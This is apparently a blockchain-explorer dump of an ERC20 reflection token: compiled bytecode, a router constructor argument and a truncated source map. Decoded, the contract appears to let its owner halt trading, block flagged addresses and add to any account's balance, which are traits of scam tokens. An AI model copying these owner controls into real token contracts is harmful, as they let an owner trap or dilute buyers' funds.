6111f0576000600960006101000a81548160ff02191690831515021790555061120c565b6001600960006101000a81548160ff0219169083151502179055505b565b600061125083836040518060400160405280601a81526020017f536166654d6174683a206469766973696f6e206279207a65726f000000000000815250611cbe565b905092915050565b600061129a83836040518060400160405280601e81526020017f536166654d6174683a207375627472616374696f6e206f766572666c6f770000815250611c2f565b905092915050565b600033905090565b60008060008060008060006112be88611d21565b9150915060006112cc611c93565b905060008060006112de8c8686611d74565b92509250925082828288889a509a509a509a509a5050505050505091939590929450565b60008082846113119190612734565b905083811015611356576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161134d906125c2565b60405180910390fd5b8091505092915050565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1614156113d0576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016113c7906126a2565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff161415611440576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611437906125a2565b60405180910390fd5b80600460008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055508173ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b9258360405161151e91906126e2565b60405180910390a3505050565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff16141561159b576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161159290612662565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff16141561160b576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161160290612562565b60405180910390fd5b6000811161164e576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161164590612642565b60405180910390fd5b600760008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff16806116ef5750600760008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff165b156117385760008114611737576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161172e90612682565b60405180910390fd5b5b60011515600960009054906101000a900460ff161515148061178c575061175d610b98565b73ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff16145b806117c9575061179a610b98565b73ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff16145b15611bd357600560008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff1680156118715750600560008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff16155b15611a24576118e281604051806060016040528060268152602001612d5a60269139600160008773ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054611c2f9092919063ffffffff16565b600160008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000208190555061197781600160008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000205461130290919063ffffffff16565b600160008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055508173ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef83604051611a1791906126e2565b60405180910390a3611bce565b611a9081604051806060016040528060268152602001612d5a60269139600160008773ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054611c2f9092919063ffffffff16565b600160008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002081905550611b2581600160008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000205461130290919063ffffffff16565b600160008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055508173ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef83604051611bc591906126e2565b60405180910390a35b611c2a565b60011515600960009054906101000a900460ff16151514611c29576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611c2090612682565b60405180910390fd5b5b505050565b6000838311158290611c77576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611c6e9190612540565b60405180910390fd5b5060008385611c869190612815565b9050809150509392505050565b6000806000611ca0611dd2565b91509150611cb7818361120e90919063ffffffff16565b9250505090565b60008083118290611d05576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611cfc9190612540565b60405180910390fd5b5060008385611d14919061278a565b9050809150509392505050565b6000806000611d4e6002611d406103e88761120e90919063ffffffff16565b6120a190919063ffffffff16565b90506000611d65828661125890919063ffffffff16565b90508082935093505050915091565b600080600080611d8d85886120a190919063ffffffff16565b90506000611da486886120a190919063ffffffff16565b90506000611dbb828461125890919063ffffffff16565b905082818395509550955050505093509350939050565b6000806000600a549050600068a2a15d09519be00000905060005b60068054905081101561205657826002600060068481548110611e1357611e126129d9565b5b9060005260206000200160009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020541180611f015750816003600060068481548110611e9957611e986129d9565b5b9060005260206000200160009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054115b15611f1f57600a5468a2a15d09519be000009450945050505061209d565b611faf6002600060068481548110611f3a57611f396129d9565b5b9060005260206000200160009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020548461125890919063ffffffff16565b92506120416003600060068481548110611fcc57611fcb6129d9565b5b9060005260206000200160009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020548361125890919063ffffffff16565b9150808061204e90612903565b915050611ded565b5061207568a2a15d09519be00000600a5461120e90919063ffffffff16565b82101561209457600a5468a2a15d09519be0000093509350505061209d565b81819350935050505b9091565b6000808314156120b45760009050612116565b600082846120c291906127bb565b90508284826120d1919061278a565b14612111576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161210890612602565b60405180910390fd5b809150505b92915050565b60008135905061212b81612d14565b92915050565b60008135905061214081612d2b565b92915050565b60008135905061215581612d42565b92915050565b60006020828403121561217157612170612a08565b5b600061217f8482850161211c565b91505092915050565b6000806040838503121561219f5761219e612a08565b5b60006121ad8582860161211c565b92505060206121be8582860161211c565b9150509250929050565b6000806000606084860312156121e1576121e0612a08565b5b60006121ef8682870161211c565b93505060206122008682870161211c565b925050604061221186828701612146565b9150509250925092565b6000806040838503121561223257612231612a08565b5b60006122408582860161211c565b925050602061225185828601612146565b9150509250929050565b60006020828403121561227157612270612a08565b5b600061227f84828501612146565b91505092915050565b6000806040838503121561229f5761229e612a08565b5b60006122ad85828601612146565b92505060206122be85828601612131565b9150509250929050565b6122d181612849565b82525050565b6122e08161285b565b82525050565b60006122f182612718565b6122fb8185612723565b935061230b81856020860161289e565b61231481612a0d565b840191505092915050565b600061232c602383612723565b915061233782612a1e565b604082019050919050565b600061234f602a83612723565b915061235a82612a6d565b604082019050919050565b6000612372602283612723565b915061237d82612abc565b604082019050919050565b6000612395601b83612723565b91506123a082612b0b565b602082019050919050565b60006123b8601f83612723565b91506123c382612b34565b602082019050919050565b60006123db602183612723565b91506123e682612b5d565b604082019050919050565b60006123fe602083612723565b915061240982612bac565b602082019050919050565b6000612421602983612723565b915061242c82612bd5565b604082019050919050565b6000612444602583612723565b915061244f82612c24565b604082019050919050565b6000612467600083612723565b915061247282612c73565b600082019050919050565b600061248a602483612723565b915061249582612c76565b604082019050919050565b60006124ad602c83612723565b91506124b882612cc5565b604082019050919050565b6124cc81612887565b82525050565b6124db81612891565b82525050565b60006020820190506124f660008301846122c8565b92915050565b600060408201905061251160008301856122c8565b61251e60208301846122d7565b9392505050565b600060208201905061253a60008301846122d7565b92915050565b6000602082019050818103600083015261255a81846122e6565b905092915050565b6000602082019050818103600083015261257b8161231f565b9050919050565b6000602082019050818103600083015261259b81612342565b9050919050565b600060208201905081810360008301526125bb81612365565b9050919050565b600060208201905081810360008301526125db81612388565b9050919050565b600060208201905081810360008301526125fb816123ab565b9050919050565b6000602082019050818103600083015261261b816123ce565b9050919050565b6000602082019050818103600083015261263b816123f1565b9050919050565b6000602082019050818103600083015261265b81612414565b9050919050565b6000602082019050818103600083015261267b81612437565b9050919050565b6000602082019050818103600083015261269b8161245a565b9050919050565b600060208201905081810360008301526126bb8161247d565b9050919050565b600060208201905081810360008301526126db816124a0565b9050919050565b60006020820190506126f760008301846124c3565b92915050565b600060208201905061271260008301846124d2565b92915050565b600081519050919050565b600082825260208201905092915050565b600061273f82612887565b915061274a83612887565b9250827fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff0382111561277f5761277e61294c565b5b828201905092915050565b600061279582612887565b91506127a083612887565b9250826127b0576127af61297b565b5b828204905092915050565b60006127c682612887565b91506127d183612887565b9250817fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff048311821515161561280a5761280961294c565b5b828202905092915050565b600061282082612887565b915061282b83612887565b92508282101561283e5761283d61294c565b5b828203905092915050565b600061285482612867565b9050919050565b60008115159050919050565b600073ffffffffffffffffffffffffffffffffffffffff82169050919050565b6000819050919050565b600060ff82169050919050565b60005b838110156128bc5780820151818401526020810190506128a1565b838111156128cb576000848401525b50505050565b600060028204905060018216806128e957607f821691505b602082108114156128fd576128fc6129aa565b5b50919050565b600061290e82612887565b91507fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff8214156129415761294061294c565b5b600182019050919050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601160045260246000fd5b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601260045260246000fd5b7f4e487b7100000000000000000000000000000000000000000000000000000000600052602260045260246000fd5b7f4e487b7100000000000000000000000000000000000000000000000000000000600052603260045260246000fd5b600080fd5b6000601f19601f8301169050919050565b7f45524332303a207472616e7366657220746f20746865207a65726f206164647260008201527f6573730000000000000000000000000000000000000000000000000000000000602082015250565b7f416d6f756e74206d757374206265206c657373207468616e20746f74616c207260008201527f65666c656374696f6e7300000000000000000000000000000000000000000000602082015250565b7f45524332303a20617070726f766520746f20746865207a65726f20616464726560008201527f7373000000000000000000000000000000000000000000000000000000000000602082015250565b7f536166654d6174683a206164646974696f6e206f766572666c6f770000000000600082015250565b7f416d6f756e74206d757374206265206c657373207468616e20737570706c7900600082015250565b7f536166654d6174683a206d756c7469706c69636174696f6e206f766572666c6f60008201527f7700000000000000000000000000000000000000000000000000000000000000602082015250565b7f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e6572600082015250565b7f5472616e7366657220616d6f756e74206d75737420626520677265617465722060008201527f7468616e207a65726f0000000000000000000000000000000000000000000000602082015250565b7f45524332303a207472616e736665722066726f6d20746865207a65726f20616460008201527f6472657373000000000000000000000000000000000000000000000000000000602082015250565b50565b7f45524332303a20617070726f76652066726f6d20746865207a65726f2061646460008201527f7265737300000000000000000000000000000000000000000000000000000000602082015250565b7f4578636c75646564206164647265737365732063616e6e6f742063616c6c207460008201527f6869732066756e6374696f6e0000000000000000000000000000000000000000602082015250565b612d1d81612849565b8114612d2857600080fd5b50565b612d348161285b565b8114612d3f57600080fd5b50565b612d4b81612887565b8114612d5657600080fd5b5056fe45524332303a207472616e7366657220616d6f756e7420657863656564732062616c616e636545524332303a207472616e7366657220616d6f756e74206578636565647320616c6c6f77616e636545524332303a2064656372656173656420616c6c6f77616e63652062656c6f77207a65726fa2646970667358221220fab7d4781aece0e7cdc70b5fc542dfcf7aadebed29b7b164089c4125b6b311fa64736f6c63430008060033

Constructor Arguments (ABI-Encoded and is the last bytes of the Contract Creation Code above)

0000000000000000000000007a250d5630b4cf539739df2c5dacb4c659f2488d

-----Decoded View---------------
Arg [0] : router (address): 0x7a250d5630B4cF539739dF2C5dAcb4c659F2488D

-----Encoded View---------------
1 Constructor Arguments found :
Arg [0] : 0000000000000000000000007a250d5630b4cf539739df2c5dacb4c659f2488d


Deployed Bytecode Sourcemap

897:10645:0:-:0;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;5059:376;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;2978:83;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;1569:30;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;3814:161;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;3255:95;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;4129:313;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;2881:89;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;5885:253;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;3164:83;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;4450:218;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;2601:118;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;5443:434;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;4953:94;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;3362:118;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;13483:148:1;;;:::i;:::-;;13050:79;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;3069:87:0;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;3985:132;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;2288:301;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;4676:269;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;3488:167;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;3663:143;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;2731:138;;;:::i;:::-;;5059:376;5111:14;5128:12;:10;:12::i;:::-;5111:29;;5160:11;:19;5172:6;5160:19;;;;;;;;;;;;;;;;;;;;;;;;;5159:20;5151:77;;;;;;;;;;;;:::i;:::-;;;;;;;;;5240:15;5263:19;5274:7;5263:10;:19::i;:::-;5239:43;;;;;;5311:28;5331:7;5311;:15;5319:6;5311:15;;;;;;;;;;;;;;;;:19;;:28;;;;:::i;:::-;5293:7;:15;5301:6;5293:15;;;;;;;;;;;;;;;:46;;;;5360:20;5372:7;5360;;:11;;:20;;;;:::i;:::-;5350:7;:30;;;;5404:23;5419:7;5404:10;;:14;;:23;;;;:::i;:::-;5391:10;:36;;;;5100:335;;5059:376;:::o;2978:83::-;3015:13;3048:5;3041:12;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;2978:83;:::o;1569:30::-;;;;;;;;;;;;;:::o;3814:161::-;3889:4;3906:39;3915:12;:10;:12::i;:::-;3929:7;3938:6;3906:8;:39::i;:::-;3963:4;3956:11;;3814:161;;;;:::o;3255:95::-;3308:7;1757:19;3328:14;;3255:95;:::o;4129:313::-;4227:4;4244:36;4254:6;4262:9;4273:6;4244:9;:36::i;:::-;4291:121;4300:6;4308:12;:10;:12::i;:::-;4322:89;4360:6;4322:89;;;;;;;;;;;;;;;;;:11;:19;4334:6;4322:19;;;;;;;;;;;;;;;:33;4342:12;:10;:12::i;:::-;4322:33;;;;;;;;;;;;;;;;:37;;:89;;;;;:::i;:::-;4291:8;:121::i;:::-;4430:4;4423:11;;4129:313;;;;;:::o;2881:89::-;2928:4;2952:10;;;;;;;;;;;2945:17;;2881:89;:::o;5885:253::-;5951:7;5990;;5979;:18;;5971:73;;;;;;;;;;;;:::i;:::-;;;;;;;;;6055:19;6078:10;:8;:10::i;:::-;6055:33;;6106:24;6118:11;6106:7;:11;;:24;;;;:::i;:::-;6099:31;;;5885:253;;;:::o;3164:83::-;3205:5;3230:9;;;;;;;;;;;3223:16;;3164:83;:::o;4450:218::-;4538:4;4555:83;4564:12;:10;:12::i;:::-;4578:7;4587:50;4626:10;4587:11;:25;4599:12;:10;:12::i;:::-;4587:25;;;;;;;;;;;;;;;:34;4613:7;4587:34;;;;;;;;;;;;;;;;:38;;:50;;;;:::i;:::-;4555:8;:83::i;:::-;4656:4;4649:11;;4450:218;;;;:::o;2601:118::-;2662:4;2686:12;:25;2699:11;2686:25;;;;;;;;;;;;;;;;;;;;;;;;;2679:32;;2601:118;;;:::o;5443:434::-;5533:7;1757:19;5561:7;:18;;5553:62;;;;;;;;;;;;:::i;:::-;;;;;;;;;5631:17;5626:244;;5666:15;5689:19;5700:7;5689:10;:19::i;:::-;5665:43;;;;;;5730:7;5723:14;;;;;5626:244;5772:23;5802:19;5813:7;5802:10;:19::i;:::-;5770:51;;;;;;5843:15;5836:22;;;5443:434;;;;;:::o;4953:94::-;5002:7;5029:10;;5022:17;;4953:94;:::o;3362:118::-;3428:7;3456;:16;3464:7;3456:16;;;;;;;;;;;;;;;;3449:23;;3362:118;;;:::o;13483:148:1:-;12884:12;:10;:12::i;:::-;12874:22;;:6;;;;;;;;;;:22;;;12866:67;;;;;;;;;;;;:::i;:::-;;;;;;;;;13590:1:::1;13553:40;;13574:6;::::0;::::1;;;;;;;;13553:40;;;;;;;;;;;;13621:1;13604:6:::0;::::1;:19;;;;;;;;;;;;;;;;;;13483:148::o:0;13050:79::-;13088:7;13115:6;;;;;;;;;;;13108:13;;13050:79;:::o;3069:87:0:-;3108:13;3141:7;3134:14;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;3069:87;:::o;3985:132::-;12884:12:1;:10;:12::i;:::-;12874:22;;:6;;;;;;;;;;:22;;;12866:67;;;;;;;;;;;;:::i;:::-;;;;;;;;;4083:26:0::1;4102:6;4083:7;:14;4091:5;4083:14;;;;;;;;;;;;;;;;:18;;:26;;;;:::i;:::-;4066:7;:14;4074:5;4066:14;;;;;;;;;;;;;;;:43;;;;3985:132:::0;;:::o;2288:301::-;12884:12:1;:10;:12::i;:::-;12874:22;;:6;;;;;;;;;;:22;;;12866:67;;;;;;;;;;;;:::i;:::-;;;;;;;;;2393:4:0::1;2364:33;;:12;:25;2377:11;2364:25;;;;;;;;;;;;;;;;;;;;;;;;;:33;;;2360:222;;;2442:5;2414:12;:25;2427:11;2414:25;;;;;;;;;;;;;;;;:33;;;;;;;;;;;;;;;;;;2360:222;;;2494:4;2466:12;:25;2479:11;2466:25;;;;;;;;;;;;;;;;:32;;;;;;;;;;;;;;;;;;2518:50;2529:11;2542:12;:25;2555:11;2542:25;;;;;;;;;;;;;;;;;;;;;;;;;2518:50;;;;;;;:::i;:::-;;;;;;;;2360:222;2288:301:::0;:::o;4676:269::-;4769:4;4786:129;4795:12;:10;:12::i;:::-;4809:7;4818:96;4857:15;4818:96;;;;;;;;;;;;;;;;;:11;:25;4830:12;:10;:12::i;:::-;4818:25;;;;;;;;;;;;;;;:34;4844:7;4818:34;;;;;;;;;;;;;;;;:38;;:96;;;;;:::i;:::-;4786:8;:129::i;:::-;4933:4;4926:11;;4676:269;;;;:::o;3488:167::-;3566:4;3583:42;3593:12;:10;:12::i;:::-;3607:9;3618:6;3583:9;:42::i;:::-;3643:4;3636:11;;3488:167;;;;:::o;3663:143::-;3744:7;3771:11;:18;3783:5;3771:18;;;;;;;;;;;;;;;:27;3790:7;3771:27;;;;;;;;;;;;;;;;3764:34;;3663:143;;;;:::o;2731:138::-;12884:12:1;:10;:12::i;:::-;12874:22;;:6;;;;;;;;;;:22;;;12866:67;;;;;;;;;;;;:::i;:::-;;;;;;;;;2809:4:0::1;2795:18;;:10;;;;;;;;;;;:18;;;2791:71;;;2829:5;2816:10;;:18;;;;;;;;;;;;;;;;;;2791:71;;;2856:4;2843:10;;:17;;;;;;;;;;;;;;;;;;2791:71;2731:138::o:0;5940:132:1:-;5998:7;6025:39;6029:1;6032;6025:39;;;;;;;;;;;;;;;;;:3;:39::i;:::-;6018:46;;5940:132;;;;:::o;4342:136::-;4400:7;4427:43;4431:1;4434;4427:43;;;;;;;;;;;;;;;;;:3;:43::i;:::-;4420:50;;4342:136;;;;:::o;602:114::-;655:15;697:10;682:26;;602:114;:::o;9807:411:0:-;9866:7;9875;9884;9893;9902;9923:23;9948:12;9964:20;9976:7;9964:11;:20::i;:::-;9922:62;;;;9995:19;10018:10;:8;:10::i;:::-;9995:33;;10040:15;10057:23;10082:12;10098:39;10110:7;10119:4;10125:11;10098;:39::i;:::-;10039:98;;;;;;10156:7;10165:15;10182:4;10188:15;10205:4;10148:62;;;;;;;;;;;;;;;;9807:411;;;;;;;:::o;3957:179:1:-;4015:7;4035:9;4051:1;4047;:5;;;;:::i;:::-;4035:17;;4076:1;4071;:6;;4063:46;;;;;;;;;;;;:::i;:::-;;;;;;;;;4127:1;4120:8;;;3957:179;;;;:::o;6146:335:0:-;6256:1;6239:19;;:5;:19;;;;6231:68;;;;;;;;;;;;:::i;:::-;;;;;;;;;6337:1;6318:21;;:7;:21;;;;6310:68;;;;;;;;;;;;:::i;:::-;;;;;;;;;6419:6;6389:11;:18;6401:5;6389:18;;;;;;;;;;;;;;;:27;6408:7;6389:27;;;;;;;;;;;;;;;:36;;;;6457:7;6441:32;;6450:5;6441:32;;;6466:6;6441:32;;;;;;:::i;:::-;;;;;;;;6146:335;;;:::o;6493:1044::-;6608:1;6590:20;;:6;:20;;;;6582:70;;;;;;;;;;;;:::i;:::-;;;;;;;;;6692:1;6671:23;;:9;:23;;;;6663:71;;;;;;;;;;;;:::i;:::-;;;;;;;;;6762:1;6753:6;:10;6745:64;;;;;;;;;;;;:::i;:::-;;;;;;;;;6824:12;:20;6837:6;6824:20;;;;;;;;;;;;;;;;;;;;;;;;;:47;;;;6848:12;:23;6861:9;6848:23;;;;;;;;;;;;;;;;;;;;;;;;;6824:47;6820:78;;;6892:1;6882:6;:11;6873:25;;;;;;;;;;;;:::i;:::-;;;;;;;;;6820:78;6927:4;6913:18;;:10;;;;;;;;;;;:18;;;:39;;;;6945:7;:5;:7::i;:::-;6935:17;;:6;:17;;;6913:39;:63;;;;6969:7;:5;:7::i;:::-;6956:20;;:9;:20;;;6913:63;6909:621;;;6993:11;:19;7005:6;6993:19;;;;;;;;;;;;;;;;;;;;;;;;;:46;;;;;7017:11;:22;7029:9;7017:22;;;;;;;;;;;;;;;;;;;;;;;;;7016:23;6993:46;6989:489;;;7070:69;7090:6;7070:69;;;;;;;;;;;;;;;;;:7;:15;7078:6;7070:15;;;;;;;;;;;;;;;;:19;;:69;;;;;:::i;:::-;7052:7;:15;7060:6;7052:15;;;;;;;;;;;;;;;:87;;;;7171:30;7194:6;7171:7;:18;7179:9;7171:18;;;;;;;;;;;;;;;;:22;;:30;;;;:::i;:::-;7150:7;:18;7158:9;7150:18;;;;;;;;;;;;;;;:51;;;;7234:9;7217:35;;7226:6;7217:35;;;7245:6;7217:35;;;;;;:::i;:::-;;;;;;;;6989:489;;;7294:69;7314:6;7294:69;;;;;;;;;;;;;;;;;:7;:15;7302:6;7294:15;;;;;;;;;;;;;;;;:19;;:69;;;;;:::i;:::-;7276:7;:15;7284:6;7276:15;;;;;;;;;;;;;;;:87;;;;7395:30;7418:6;7395:7;:18;7403:9;7395:18;;;;;;;;;;;;;;;;:22;;:30;;;;:::i;:::-;7374:7;:18;7382:9;7374:18;;;;;;;;;;;;;;;:51;;;;7458:9;7441:35;;7450:6;7441:35;;;7469:6;7441:35;;;;;;:::i;:::-;;;;;;;;6989:489;6909:621;;;7519:4;7505:18;;:10;;;;;;;;;;;:18;;;7496:32;;;;;;;;;;;;:::i;:::-;;;;;;;;;6909:621;6493:1044;;;:::o;4704:190:1:-;4790:7;4823:1;4818;:6;;4826:12;4810:29;;;;;;;;;;;;;;:::i;:::-;;;;;;;;;;4850:9;4866:1;4862;:5;;;;:::i;:::-;4850:17;;4885:1;4878:8;;;4704:190;;;;;:::o;10807:163:0:-;10848:7;10869:15;10886;10905:19;:17;:19::i;:::-;10868:56;;;;10942:20;10954:7;10942;:11;;:20;;;;:::i;:::-;10935:27;;;;10807:163;:::o;6492:276:1:-;6578:7;6610:1;6606;:5;6613:12;6598:28;;;;;;;;;;;;;;:::i;:::-;;;;;;;;;;6637:9;6653:1;6649;:5;;;;:::i;:::-;6637:17;;6759:1;6752:8;;;6492:276;;;;;:::o;10226:231:0:-;10286:7;10295;10315:12;10330:24;10352:1;10330:17;10342:4;10330:7;:11;;:17;;;;:::i;:::-;:21;;:24;;;;:::i;:::-;10315:39;;10365:23;10391:17;10403:4;10391:7;:11;;:17;;;;:::i;:::-;10365:43;;10427:15;10444:4;10419:30;;;;;;10226:231;;;:::o;10465:334::-;10560:7;10569;10578;10598:15;10616:24;10628:11;10616:7;:11;;:24;;;;:::i;:::-;10598:42;;10651:12;10666:21;10675:11;10666:4;:8;;:21;;;;:::i;:::-;10651:36;;10698:23;10724:17;10736:4;10724:7;:11;;:17;;;;:::i;:::-;10698:43;;10760:7;10769:15;10786:4;10752:39;;;;;;;;;10465:334;;;;;;;:::o;10978:561::-;11028:7;11037;11057:15;11075:7;;11057:25;;11093:15;1757:19;11093:25;;11140:9;11135:289;11159:9;:16;;;;11155:1;:20;11135:289;;;11225:7;11201;:21;11209:9;11219:1;11209:12;;;;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;11201:21;;;;;;;;;;;;;;;;:31;:66;;;;11260:7;11236;:21;11244:9;11254:1;11244:12;;;;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;11236:21;;;;;;;;;;;;;;;;:31;11201:66;11197:97;;;11277:7;;1757:19;11269:25;;;;;;;;;11197:97;11319:34;11331:7;:21;11339:9;11349:1;11339:12;;;;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;11331:21;;;;;;;;;;;;;;;;11319:7;:11;;:34;;;;:::i;:::-;11309:44;;11378:34;11390:7;:21;11398:9;11408:1;11398:12;;;;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;11390:21;;;;;;;;;;;;;;;;11378:7;:11;;:34;;;;:::i;:::-;11368:44;;11177:3;;;;;:::i;:::-;;;;11135:289;;;;11448:20;1757:19;11448:7;;:11;;:20;;;;:::i;:::-;11438:7;:30;11434:61;;;11478:7;;1757:19;11470:25;;;;;;;;11434:61;11514:7;11523;11506:25;;;;;;10978:561;;;:::o;5073:467:1:-;5131:7;5381:1;5376;:6;5372:47;;;5406:1;5399:8;;;;5372:47;5429:9;5445:1;5441;:5;;;;:::i;:::-;5429:17;;5474:1;5469;5465;:5;;;;:::i;:::-;:10;5457:56;;;;;;;;;;;;:::i;:::-;;;;;;;;;5531:1;5524:8;;;5073:467;;;;;:::o;7:139:2:-;53:5;91:6;78:20;69:29;;107:33;134:5;107:33;:::i;:::-;59:87;;;;:::o;152:133::-;195:5;233:6;220:20;211:29;;249:30;273:5;249:30;:::i;:::-;201:84;;;;:::o;291:139::-;337:5;375:6;362:20;353:29;;391:33;418:5;391:33;:::i;:::-;343:87;;;;:::o;436:329::-;495:6;544:2;532:9;523:7;519:23;515:32;512:2;;;550:79;;:::i;:::-;512:2;670:1;695:53;740:7;731:6;720:9;716:22;695:53;:::i;:::-;685:63;;641:117;502:263;;;;:::o;771:474::-;839:6;847;896:2;884:9;875:7;871:23;867:32;864:2;;;902:79;;:::i;:::-;864:2;1022:1;1047:53;1092:7;1083:6;1072:9;1068:22;1047:53;:::i;:::-;1037:63;;993:117;1149:2;1175:53;1220:7;1211:6;1200:9;1196:22;1175:53;:::i;:::-;1165:63;;1120:118;854:391;;;;;:::o;1251:619::-;1328:6;1336;1344;1393:2;1381:9;1372:7;1368:23;1364:32;1361:2;;;1399:79;;:::i;:::-;1361:2;1519:1;1544:53;1589:7;1580:6;1569:9;1565:22;1544:53;:::i;:::-;1534:63;;1490:117;1646:2;1672:53;1717:7;1708:6;1697:9;1693:22;1672:53;:::i;:::-;1662:63;;1617:118;1774:2;1800:53;1845:7;1836:6;1825:9;1821:22;1800:53;:::i;:::-;1790:63;;1745:118;1351:519;;;;;:::o;1876:474::-;1944:6;1952;2001:2;1989:9;1980:7;1976:23;1972:32;1969:2;;;2007:79;;:::i;:::-;1969:2;2127:1;2152: